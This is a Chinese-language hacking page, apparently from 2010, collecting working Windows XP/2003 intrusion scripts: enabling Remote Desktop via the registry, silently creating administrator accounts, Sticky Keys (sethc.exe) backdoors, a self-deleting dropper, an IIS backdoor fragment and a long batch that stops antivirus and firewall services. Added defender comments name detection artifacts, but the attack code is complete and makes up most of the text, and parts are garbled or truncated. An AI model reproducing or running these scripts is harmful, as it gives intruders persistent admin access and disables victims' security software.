xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本+提权VBS 整理收集
xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本+提权VBS 整理收集
2010年12月07日
xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本
vbson error resume next
' Turns on Remote Desktop (Terminal Services) on the local machine by writing
' registry values through the WMI StdRegProv provider instead of reg.exe/regedit.
' Defender view: the only lasting artifacts are the three registry values written
' below. Audit writes under ...\Control\Terminal Server and treat fDenyTSConnections
' changing to 0 on a host that is not meant to expose RDP as an alert condition.
' Keep TCP 3389 filtered at the network boundary regardless of this setting.
const HKEY_LOCAL_MACHINE = &H80000002
' "." targets the local computer.
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\" &_
strComputer & "\root\default:StdRegProv")
' Make sure the Terminal Server keys exist before values are written to them.
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
' This assignment is overwritten on the next line before it is used.
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
' fDenyTSConnections = 0 removes the "deny incoming connections" flag.
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' Listener port is set to 3389 in both the transport key and the RDP-Tcp WinStation key.
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' Creates a local account through the ADSI WinNT provider and adds it to the local
' Administrators group. Name and password come from the first two script arguments,
' otherwise the hard-coded defaults below are used. Errors are suppressed throughout.
' Defender view: no net.exe/net1.exe process is started, so detections keyed on
' "net user" or "net localgroup" command lines do not fire. Rely on account-management
' auditing (user created, member added to Administrators) and on logging of
' wscript.exe/cscript.exe executions. The default account name on this page is a
' usable hunting indicator.
on error resume next
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
' Swaps the Sticky Keys accessibility binary (sethc.exe) for a copy of cmd.exe and then
' deletes this script file. This is the accessibility-features persistence technique
' (MITRE ATT&CK T1546.008).
' Defender view, artifacts left on disk: a sethc.exe in system32 whose hash and version
' information match cmd.exe, plus the files asethc.exe and (transiently) acmd.exe.
' Detection: file-integrity checks on the accessibility binaries, and process logging
' for takeown/cacls aimed at system32 executables or for cmd.exe started by
' wscript.exe/cscript.exe with a hidden window.
' NOTE: the command string below contains extraction damage (the © characters) and is
' reproduced exactly as found on the page.
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
' Window style 0 hides the console; True makes Run wait for the command chain to finish.
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
' Deletes the file named by WScript.ScriptName (this script), so the dropper itself is
' usually gone by the time of triage. Process-creation logs are the evidence source.
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
加用户
--------------------------------
rem Builds a temporary 3389.reg file line by line, imports it silently with regedit /s,
rem then deletes it. The values written are fDenyTSConnections=0 and PortNumber=0x0d3d
rem (3389 decimal) under the Terminal Server keys, i.e. Remote Desktop is switched on.
rem Defender view: the .reg file is removed afterwards, so look for regedit.exe run with
rem /s from a script or web-server process and for writes to the Terminal Server keys.
rem The lines are reproduced exactly as found on the page.
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.regecho "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
-------------------------------------------------
vbs加用户精简版
' Runs two net.exe commands with a hidden window (style 0): one creates a local user with
' a hard-coded name and password, the other adds it to the local Administrators group.
' Defender view: both commands appear verbatim in process-creation logs with
' wscript.exe/cscript.exe as the parent, and account-management auditing records the new
' account and the group change.
set w=createobject("wscript.shell"):w.run "net user hack echoeye /add",0:w.run "net localgroup administrators hack /add",0
-----------------------------------------------------
cmd.asp webshell 上传
---------------------------------------------------
--------------------------------
Shift后门
-----------------------------------------
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门 By:Hack残少 QQ:297248524
echo.
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
rem Operative part of the script: overwrites the Sticky Keys binary with a copy of
rem explorer.exe, writes the same file into system32\dllcache, and marks both copies hidden.
rem The dllcache copy is presumably there so Windows File Protection does not restore the
rem original binary (inferred from the path, not stated on the page).
rem Defender view: compare sethc.exe in system32 and in dllcache against known-good hashes.
rem A hidden attribute on either file, or version information that identifies a different
rem program, indicates tampering (MITRE ATT&CK T1546.008).
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后门安装完毕!
echo.
echo 感谢您使用Shift后门
echo.
echo By:Hack残少 QQ:297248524
echo.
echo http://www.shenmicaobi.com/
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit
--------------------------
不依靠CMD添加用户的VBS代码
' Creates a local account named "test" with a fixed password through the ADSI WinNT
' provider and adds it to the local Administrators group, without starting cmd.exe or net.exe.
' Defender view: command-line monitoring for "net user" sees nothing here. The evidence is
' the account-management audit trail and the wscript.exe/cscript.exe execution itself.
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) ' bind to the local computer through the ADSI interface
Set oe=GetObject(os&"/Administrators,group") ' the local Administrators group
Set od=ob.Create("user","test") ' create the user object
od.SetPassword "1234" ' set the password
od.SetInfo ' commit the new account
Set of=GetObject(os&"/test",user) ' look up the new user
oe.add os&"/test"
------------------------------------------
用vbs实现本地添加用户的脚本
' Opens a cmd.exe window and types "net user admin<i> abcd@123 /add" into it for i = 1..3
' using simulated keystrokes, then types "exit".
' Defender view: the keystrokes go to whichever window has focus, so this needs an
' interactive desktop session. The net.exe invocations still show up in process-creation
' logs as children of cmd.exe, and three sequentially numbered accounts sharing one
' password are a clear pattern in account-management audit events.
Dim WshShell
set WshShell = CreateObject("wscript.Shell")
WshShell.Run "cmd /k"
for i = 1 to 3
' The half-second pause gives the console window time to take focus before typing.
WScript.Sleep 500
WshShell.SendKeys "net user admin" & i & " abcd@123 /add"
WshShell.SendKeys "{ENTER}"
next
WshShell.SendKeys "exit"
WshShell.SendKeys "{ENTER}"
---------------------------------------------
上帝之门 执行成功 3389 管理员帐号任意密码登入 保存为.exe
------------------------
MZ
------------------------
IIs后门
-------------------
help1="IIS后门设置器 黑猫专用版"
help2="请输入正确的虚拟目录名称和映射的路径,格式如下"
help3=" cscript.exe iis.vbs 虚拟目录的名称 映射的路径"
help4="例如: cscript.exe iis.vbs lh e:"
set Args = Wscript.Arguments
if args.count telnet_tmp.vbs
echo WScript.Sleep 300 >>telnet_tmp.vbs
echo sh.SendKeys "open 192.168.1.200" >>telnet_tmp.vbs
echo WScript.Sleep 300 >>telnet_tmp.vbs
echo sh.SendKeys "{ENTER}" >>telnet_tmp.vbs
echo WScript.Sleep 300 >>telnet_tmp.vbs
echo sh.SendKeys "engineer{ENTER}" >>telnet_tmp.vbs
echo WScript.Sleep 300 >>telnet_tmp.vbs
echo sh.SendKeys "ls {ENTER}">>telnet_tmp.vbs
start telnet
cscript //nologo telnet_tmp.vbs
del telnet_tmp.vbs
附录:
对于SendKeys这个命令可以send什么,我们可以看下面的列表:
BACKSPACE {BACKSPACE}, {BS}, or {BKSP}
BREAK {BREAK}
CAPS LOCK {CAPSLOCK}
DEL or DELETE {DELETE} or {DEL}
DOWN ARROW {DOWN}
END {END}
ENTER {ENTER}or ~
ESC {ESC}
HELP {HELP}
HOME {HOME}
INS or INSERT {INSERT} or {INS}
LEFT ARROW {LEFT}
NUM LOCK {NUMLOCK}
PAGE DOWN {PGDN}
PAGE UP {PGUP}
PRINT SCREEN {PRTSC}
RIGHT ARROW {RIGHT}
SCROLL LOCK {SCROLLLOCK}
TAB {TAB}
UP ARROW {UP}
F1 {F1}
F2 {F2}
F3 {F3}
F4 {F4}
F5 {F5}
F6 {F6}
F7 {F7}
F8 {F8}
F9 {F9}
F10 {F10}
F11 {F11}
F12 {F12}
F13 {F13}
F14 {F14}
F15 {F15}
F16 {F16}
SHIFT +
CTRL ^
ALT %
二。Linux平台
请确保系统上已安装expect这个可执行程序,将以下代码保存到文件autoTelnet,并赋予执行权限。详细用法请查看expect命令的说明。
#!/usr/bin/expect --
# Automates a telnet login: spawns telnet, answers the "Password:" prompt, waits for a
# "#" prompt, sends "ls", then hands the session to the user.
# Security notes: the password sits in clear text in this file and telnet sends it
# unencrypted over the network. Restrict the file's permissions, and prefer SSH with
# key-based authentication where the target supports it.

# SERVER holds the first three octets; the last one comes from the command line.
set SERVER "192.168.1"
# USER is assigned but never referenced below; only the password prompt is answered.
set USER "myusername"
set PASSWD "mypass"
# With an argument, connect to SERVER.<argument>; without one, default to SERVER.200.
if { $argc } {
spawn telnet $SERVER.$argv
} else {
spawn telnet $SERVER.200
}
expect "Password:"
send "$PASSWD\n"
# A "#" prompt is taken as the sign that the login succeeded.
expect "#"
send "ls\n"
# Return control of the session to the interactive user.
interact
关闭防火墙和杀毒软件的脚本
@echo off
rem Everything from here to the final "exit" is a flat list of net stop "<name>" /y calls.
rem The names cover antivirus, personal-firewall and IDS products as well as Windows
rem components (ICF/ICS, IPSEC services, Protected Storage). The list mixes service names
rem with executable image names, and a long leading run of entries is repeated verbatim.
rem Defender view (MITRE ATT&CK T1562.001, impair defenses): a burst of net.exe/net1.exe
rem launches with "stop" arguments from one parent process is a high-confidence signal.
rem Alert on Service Control Manager "entered the stopped state" events for security
rem services, enable the product's tamper protection where it exists, and limit which
rem accounts hold the administrative rights needed to stop services.
net stop "Ecengine.exe" /y
net stop "eSafe Protect Desktop" /y
net stop "Esafe.exe" /y
net stop "Espwatch.exe" /y
net stop "eTrust EZ Firewall" /y
net stop "F-Agnt95.exe" /y
net stop "Findviru.exe" /y
net stop "Fprot.exe" /y
net stop "F-Prot.exe" /y
net stop "F-PROT95" /y
net stop "F-Prot95.exe" /y
net stop "FP-WIN" /y
net stop "Fp-Win.exe" /y
net stop "Freedom 2" /y
net stop "Frw.exe" /y
net stop "F-STOPW" /y
net stop "F-Stopw.exe" /y
net stop "GNAT Box Lite" /y
net stop "IAMAPP" /y
net stop "Iamapp.exe" /y
net stop "Iamserv.exe" /y
net stop "Ibmasn.exe" /y
net stop "Ibmavsp.exe" /y
net stop "Icload95.exe" /y
net stop "Icloadnt.exe" /y
net stop "ICMON" /y
net stop "Icmon.exe" /y
net stop "Icsupp95.exe" /y
net stop "Icsuppnt.exe" /y
net stop "Iface.exe" /y
net stop "Internet Alert 99" /y
net stop "IOMON98" /y
net stop "Iomon98.exe" /y
net stop "Jedi.exe" /y
net stop "LOCKDOWN2000" /y
net stop "Lockdown2000.exe" /y
net stop "Look'n'Stop" /y
net stop "Look'n'Stop Lite" /y
net stop "Lookout.exe" /y
net stop "LUALL" /y
net stop "Luall.exe" /y
net stop "LUCOMSERVER" /y
net stop "MCAFEE" /y
net stop "McAfee Firewall" /y
net stop "McAfee Internet Guard Dog Pro" /y
net stop "Moolive.exe" /y
net stop "Mpftray.exe" /y
net stop "N32scanw.exe" /y
net stop "NAVAPSVC" /y
net stop "NAVAPW32" /y
net stop "Navapw32.exe" /y
net stop "NAVLU32" /y
net stop "Navlu32.exe" /y
net stop "Navnt.exe" /y
net stop "NAVRUNR" /y
net stop "NAVW32" /y
net stop "Navw32.exe" /y
net stop "NAVWNT" /y
net stop "Navwnt.exe" /y
net stop "NeoWatch" /y
net stop "NISSERV" /y
net stop "NISUM" /y
net stop "Nisum.exe" /y
net stop "NMAIN" /y
net stop "Nmain.exe" /y
net stop "Norman Personal Firewall" /y
net stop "Normist.exe" /y
net stop "NORTON" /y
net stop "Norton AntiVirus Server" /y
net stop "Norton Internet Security" /y
net stop "Norton Personal Firewall 2001" /y
net stop "Nupgrade.exe" /y
net stop "NVC95" /y
net stop "Nvc95.exe" /y
net stop "Outpost.exe" /y
net stop "Padmin.exe" /y
net stop "Pavcl.exe" /y
net stop "Pavsched.exe" /y
net stop "Pavw.exe" /y
net stop "Pc firewall" /y
net stop "PC Viper" /y
net stop "PCCIOMON" /y
net stop "Ecengine.exe" /y
net stop "eSafe Protect Desktop" /y
net stop "Esafe.exe" /y
net stop "Espwatch.exe" /y
net stop "eTrust EZ Firewall" /y
net stop "F-Agnt95.exe" /y
net stop "Findviru.exe" /y
net stop "Fprot.exe" /y
net stop "F-Prot.exe" /y
net stop "F-PROT95" /y
net stop "F-Prot95.exe" /y
net stop "FP-WIN" /y
net stop "Fp-Win.exe" /y
net stop "Freedom 2" /y
net stop "Frw.exe" /y
net stop "F-STOPW" /y
net stop "F-Stopw.exe" /y
net stop "GNAT Box Lite" /y
net stop "IAMAPP" /y
net stop "Iamapp.exe" /y
net stop "Iamserv.exe" /y
net stop "Ibmasn.exe" /y
net stop "Ibmavsp.exe" /y
net stop "Icload95.exe" /y
net stop "Icloadnt.exe" /y
net stop "ICMON" /y
net stop "Icmon.exe" /y
net stop "Icsupp95.exe" /y
net stop "Icsuppnt.exe" /y
net stop "Iface.exe" /y
net stop "Internet Alert 99" /y
net stop "IOMON98" /y
net stop "Iomon98.exe" /y
net stop "Jedi.exe" /y
net stop "LOCKDOWN2000" /y
net stop "Lockdown2000.exe" /y
net stop "Look'n'Stop" /y
net stop "Look'n'Stop Lite" /y
net stop "Lookout.exe" /y
net stop "LUALL" /y
net stop "Luall.exe" /y
net stop "LUCOMSERVER" /y
net stop "MCAFEE" /y
net stop "McAfee Firewall" /y
net stop "McAfee Internet Guard Dog Pro" /y
net stop "Moolive.exe" /y
net stop "Mpftray.exe" /y
net stop "N32scanw.exe" /y
net stop "NAVAPSVC" /y
net stop "NAVAPW32" /y
net stop "Navapw32.exe" /y
net stop "NAVLU32" /y
net stop "Navlu32.exe" /y
net stop "Navnt.exe" /y
net stop "NAVRUNR" /y
net stop "NAVW32" /y
net stop "Navw32.exe" /y
net stop "NAVWNT" /y
net stop "Navwnt.exe" /y
net stop "NeoWatch" /y
net stop "NISSERV" /y
net stop "NISUM" /y
net stop "Nisum.exe" /y
net stop "NMAIN" /y
net stop "Nmain.exe" /y
net stop "Norman Personal Firewall" /y
net stop "Normist.exe" /y
net stop "NORTON" /y
net stop "Norton AntiVirus Server" /y
net stop "Norton Internet Security" /y
net stop "Norton Personal Firewall 2001" /y
net stop "Nupgrade.exe" /y
net stop "NVC95" /y
net stop "Nvc95.exe" /y
net stop "Outpost.exe" /y
net stop "Padmin.exe" /y
net stop "Pavcl.exe" /y
net stop "Pavsched.exe" /y
net stop "Pavw.exe" /y
net stop "Pc firewall" /y
net stop "PC Viper" /y
net stop "PCCIOMON" /y
net stop "PCCMAIN" /y
net stop "PCCWIN98" /y
net stop "Pccwin98.exe" /y
net stop "Pcfwallicon.exe" /y
net stop "Persfw.exe" /y
net stop "PGP Gauntlet" /y
net stop "POP3TRAP" /y
net stop "Proxy +" /y
net stop "PVIEW95" /y
net stop "Rav7.exe" /y
net stop "Rav7win.exe" /y
net stop "Rescue.exe" /y
net stop "RESCUE32" /y
net stop "SAFEWEB" /y
net stop "Safeweb.exe" /y
net stop "Scan32.exe" /y
net stop "Scan95.exe" /y
net stop "Scanpm.exe" /y
net stop "Scrscan.exe" /y
net stop "Serv95.exe" /y
net stop "Smc.exe" /y
net stop "SMCSERVICE" /y
net stop "Snort - Win32 GUI" /y
net stop "Snort (Intrusion Detection System)" /y
net stop "Sphinx.exe" /y
net stop "Sphinxwall" /y
net stop "Sweep95.exe" /y
net stop "Sybergen Secure Desktop" /y
net stop "Sybergen SyGate" /y
net stop "SYMPROXYSVC" /y
net stop "Tbscan.exe" /y
net stop "Tca.exe" /y
net stop "Tds2-98.exe" /y
net stop "Tds2-Nt.exe" /y
net stop "TermiNET" /y
net stop "TGB:BOB" /y
net stop "Tiny Personal Firewall" /y
net stop "Vet95.exe" /y
net stop "Vettray.exe" /y
net stop "Vscan40.exe" /y
net stop "Vsecomr.exe" /y
net stop "VSHWIN32" /y
net stop "Vshwin32.exe" /y
net stop "VSSTAT" /y
net stop "Vsstat.exe" /y
net stop "WEBSCANX" /y
net stop "Webscanx.exe" /y
net stop "WEBTRAP" /y
net stop "Wfindv32.exe" /y
net stop "Wingate" /y
net stop "WinProxy" /y
net stop "WinRoute" /y
net stop "WyvernWorks Firewall" /y
net stop "Zonealarm" /y
net stop "Zonealarm.exe" /y
net stop "AVP32" /y
net stop "LOCKDOWN2000" /y
net stop "AVP.EXE" /y
net stop "CFINET32" /y
net stop "CFINET" /y
net stop "ICMON" /y
net stop "SAFEWEB" /y
net stop "WEBSCANX" /y
net stop "ANTIVIR" /y
net stop "MCAFEE" /y
net stop "NORTON" /y
net stop "NVC95" /y
net stop "FP-WIN" /y
net stop "IOMON98" /y
net stop "PCCWIN98" /y
net stop "F-PROT95" /y
net stop "F-STOPW" /y
net stop "PVIEW95" /y
net stop "NAVWNT /y
net stop "NAVRUNR" /y
net stop "NAVLU32" /y
net stop "NAVAPSVC" /y
net stop "NISUM" /y
net stop "SYMPROXYSVC" /y
net stop "RESCUE32" /y
net stop "NISSERV" /y
net stop "ATRACK" /y
net stop "IAMAPP" /y
net stop "LUCOMSERVER" /y
net stop "LUALL" /y
net stop "NMAIN" /y
net stop "NAVW32" /y
net stop "NAVAPW32" /y
net stop "VSSTAT" /y
net stop "VSHWIN32" /y
net stop "AVSYNMGR" /y
net stop "AVCONSOL" /y
net stop "WEBTRAP" /y
net stop "POP3TRAP" /y
net stop "PCCMAIN" /y
net stop "PCCIOMON" /y
net stop "Virtual CD v4 Security service (SDK - Version)" /y
net stop "Norton Internet Security Accounts Manager" /y
net stop "Norton AntiVirus Auto-Protect" /y
net stop "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)" /y
net stop "Symantec Event Manager" /y
net stop "Symantec Proxy Service" /y
net stop "Symantec Settings Manager" /y
net stop "NT LM Security Support Provider" /y
net stop "Protected Storage" /y
net stop "TskSrv FTP Server" /y
net stop "Norton AntiVirus Auto Protect Service" /y
net stop "IPSEC Policy Agent" /y
net stop "MonSvcNT" /y
net stop "FTP Publishing Service" /y
net stop "IPSEC Services" /y
net stop "Symantec AntiVirus Client" /y
net stop "Sygate Personal Firewall" /y
net stop "AntiVir Service" /y
net stop "SafeNet IKE Service" /y
net stop "SafeNet Monitor Service" /y
net stop "Sophos Anti-Virus" /y
net stop "Sophos Anti-Virus Network" /y
net stop "Sophos Anti-Virus Update" /y
net stop "Firewall della connessione Internet (ICF) / Condivisione connessione Internet (ICS)" /y
net stop "Norton Unerase Protection" /y
net stop "Servizio Norton AntiVirus Auto-Protect" /y
net stop "FireDaemon Service: svchost." /y
net stop "V3MonNT" /y
net stop "PC-Keeper Service" /y
net stop "Verbindingsbeheer voor RAS" /y
net stop "Servizi IPSEC" /y
net stop "Agente criteri IPSEC" /y
net stop "McShield" /y
net stop "Smart Card" /y
net stop "F-Secure Anti-Virus Firewall Daemon" /y
net stop "F-Secure Automatic Update" /y
net stop "F-Secure Gatekeeper Handler Starter" /y
net stop "F-Secure Network Request Broker" /y
net stop "F-Secure Policy Manager Server" /y
net stop "Symantec AntiVirus" /y
net stop "Symantec AntiVirus Definition Watcher" /y
exit